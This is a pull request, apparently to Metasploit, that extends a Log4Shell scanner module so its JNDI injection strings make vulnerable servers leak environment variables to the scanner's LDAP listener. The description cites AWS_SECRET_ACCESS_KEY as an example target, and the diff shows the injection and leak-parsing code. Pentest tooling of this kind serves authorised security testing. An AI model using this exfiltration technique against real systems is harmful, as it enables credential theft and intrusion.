### PR TITLE
Updated log4shell HTTP scanner

### DIFF
--- a/documentation/modules/auxiliary/scanner/http/log4shell_scanner.md
+++ b/documentation/modules/auxiliary/scanner/http/log4shell_scanner.md
@@ -63,6 +63,11 @@ starting with `#` will be treated as comments. Lines may also contain the string
 injection point. This enables query parameters to be included in the request which are required for certain
 applications.
 
+### LEAK_PARAMS
+^-separated list of additional params to leak, for example the following would leak the USER and PATH environment
+variables: `${env:USER}^${env:PATH}`. See the [Log4j Lookups](https://logging.apache.org/log4j/2.x/manual/lookups.html)
+wiki page for more information on available parameters.
+
 ### LDAP_TIMEOUT
 Time in seconds to wait to receive LDAP connections.
 

--- a/documentation/modules/auxiliary/scanner/http/log4shell_scanner.md
+++ b/documentation/modules/auxiliary/scanner/http/log4shell_scanner.md
@@ -64,9 +64,9 @@ injection point. This enables query parameters to be included in the request whi
 applications.
 
 ### LEAK_PARAMS
-^-separated list of additional params to leak, for example the following would leak the USER and PATH environment
-variables: `${env:USER}^${env:PATH}`. See the [Log4j Lookups](https://logging.apache.org/log4j/2.x/manual/lookups.html)
-wiki page for more information on available parameters.
+Additional parameters to leak, seperated by the `^` character. For example the following would leak the USER and PATH
+environment variables: `${env:USER}^${env:PATH}`. See the [Log4j Lookups][log4j-lookups] wiki page for more information
+on available parameters.
 
 ### LDAP_TIMEOUT
 Time in seconds to wait to receive LDAP connections.
@@ -109,3 +109,5 @@ msf6 auxiliary(scanner/http/log4shell_scanner) > run http://10.10.235.209:8983/ 
 [*] Sleeping 30 seconds for any last LDAP connections
 [*] Auxiliary module execution completed
 ```
+
+[log4j-lookups]: https://logging.apache.org/log4j/2.x/manual/lookups.html

--- a/documentation/modules/auxiliary/scanner/http/log4shell_scanner.md
+++ b/documentation/modules/auxiliary/scanner/http/log4shell_scanner.md
@@ -64,7 +64,7 @@ injection point. This enables query parameters to be included in the request whi
 applications.
 
 ### LEAK_PARAMS
-Additional parameters to leak, seperated by the `^` character. For example the following would leak the USER and PATH
+Additional parameters to leak, separated by the `^` character. For example the following would leak the USER and PATH
 environment variables: `${env:USER}^${env:PATH}`. See the [Log4j Lookups][log4j-lookups] wiki page for more information
 on available parameters.
 

--- a/modules/auxiliary/scanner/http/log4shell_scanner.rb
+++ b/modules/auxiliary/scanner/http/log4shell_scanner.rb
@@ -47,7 +47,7 @@ class MetasploitModule < Msf::Auxiliary
     register_options([
       OptString.new('HTTP_METHOD', [ true, 'The HTTP method to use', 'GET' ]),
       OptString.new('TARGETURI', [ true, 'The URI to scan', '/']),
-      OptString.new('LEAK_PARAMS', [ false, '^-separated list of additional params to leak: ${env:USER}^${env:PATH}']),
+      OptString.new('LEAK_PARAMS', [ false, 'Additional parameters to leak, seperated by the ^ character (e.g., ${env:USER}^${env:PATH})']),
       OptPath.new(
         'HEADERS_FILE',
         [

--- a/modules/auxiliary/scanner/http/log4shell_scanner.rb
+++ b/modules/auxiliary/scanner/http/log4shell_scanner.rb
@@ -47,6 +47,7 @@ class MetasploitModule < Msf::Auxiliary
     register_options([
       OptString.new('HTTP_METHOD', [ true, 'The HTTP method to use', 'GET' ]),
       OptString.new('TARGETURI', [ true, 'The URI to scan', '/']),
+      OptString.new('LEAK_PARAMS', [ false, '^-separated list of additional params to leak: ${env:USER}^${env:PATH}']),
       OptPath.new(
         'HEADERS_FILE',
         [
@@ -68,20 +69,41 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def log4j_jndi_string(resource = '')
-    super(resource + '/${sys:java.vendor}_${sys:java.version}')
+    resource = resource.dup
+    resource << '/${java:os}/${sys:java.vendor}_${sys:java.version}'
+    # We should add obfuscation to the URL string to scan through lousy "next-gen" firewalls
+    unless datastore['LEAK_PARAMS'].blank?
+      resource << '/'
+      resource << datastore['LEAK_PARAMS']
+    end
+    super(resource)
   end
 
   #
   # Handle incoming requests via service mixin
   #
   def build_ldap_search_response(msg_id, base_dn)
-    token, java_version = base_dn.split('/', 2)
+    token, java_os, java_version, uri_parts = base_dn.split('/', 4)
     target_info = @mutex.synchronize { @tokens.delete(token) }
     if target_info
       @mutex.synchronize { @successes << target_info }
       details = normalize_uri(target_info[:target_uri]).to_s
       details << " (header: #{target_info[:headers].keys.first})" unless target_info[:headers].nil?
+      details << " (os: #{java_os})" unless java_os.blank?
       details << " (java: #{java_version})" unless java_version.blank?
+      unless uri_parts.blank?
+        uri_parts = uri_parts.split('^')
+        leaked = ''
+        datastore['LEAK_PARAMS'].split('^').each_with_index do |input, idx|
+          next if input == uri_parts[idx]
+
+          leaked << "#{input}=#{uri_parts[idx]}  "
+        end
+        unless leaked.blank?
+          details << " (leaked: #{leaked.rstrip})"
+          vprint_good("Leaked data: #{leaked.rstrip}")
+        end
+      end
       peerinfo = "#{target_info[:rhost]}:#{target_info[:rport]}"
       print_good("#{peerinfo.ljust(21)} - Log4Shell found via #{details}")
       report_vuln(

--- a/modules/auxiliary/scanner/http/log4shell_scanner.rb
+++ b/modules/auxiliary/scanner/http/log4shell_scanner.rb
@@ -47,7 +47,7 @@ class MetasploitModule < Msf::Auxiliary
     register_options([
       OptString.new('HTTP_METHOD', [ true, 'The HTTP method to use', 'GET' ]),
       OptString.new('TARGETURI', [ true, 'The URI to scan', '/']),
-      OptString.new('LEAK_PARAMS', [ false, 'Additional parameters to leak, seperated by the ^ character (e.g., ${env:USER}^${env:PATH})']),
+      OptString.new('LEAK_PARAMS', [ false, 'Additional parameters to leak, separated by the ^ character (e.g., ${env:USER}^${env:PATH})']),
       OptPath.new(
         'HEADERS_FILE',
         [


### PR DESCRIPTION
This is a continuation of #15961 - moving the module to a new commit to allow merge once that PR is in master

Enhancements included:

1. Migrate to native Rex infrastructure for LDAP operations
2. Implement OS collection for targeting of  #15969 
3. Implement arbitrary data leak testing - `env:AWS_SECRET_ACCESS_KEY` and such
4. Scanning over NAT with DNAT target configuration options